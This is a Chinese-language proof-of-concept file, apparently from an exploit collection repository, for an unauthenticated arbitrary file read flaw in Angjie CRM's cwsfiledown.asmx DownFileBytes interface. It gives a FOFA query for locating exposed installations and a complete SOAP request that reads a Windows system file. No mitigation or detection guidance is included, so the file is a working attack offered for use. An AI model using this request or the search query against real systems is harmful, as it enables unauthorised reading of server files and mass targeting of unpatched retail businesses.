POC/wpoc/昂捷ERP/昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

33 lines
1.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 昂捷CRM系统cwsfiledown.asmx任意文件读取漏洞
昂捷CRMCustomer Relationship Management是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块为零售企业提供全方位的客户关系管理解决方案。昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞未经身份验证攻击者可通过该漏洞读取系统重要文件
## fofa
```javascript
body="/ClientBin/slEnjoy.App.xap"
```
## poc
```xml
POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownFileBytes"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DownFileBytes xmlns="http://tempuri.org/">
<sFileName>c://windows//win.ini</sFileName>
<iPosition>1</iPosition>
<iReadBytesLen>100</iReadBytesLen>
<bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
</DownFileBytes>
</soap:Body>
</soap:Envelope>
```
![image-20241128094832675](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280948742.png)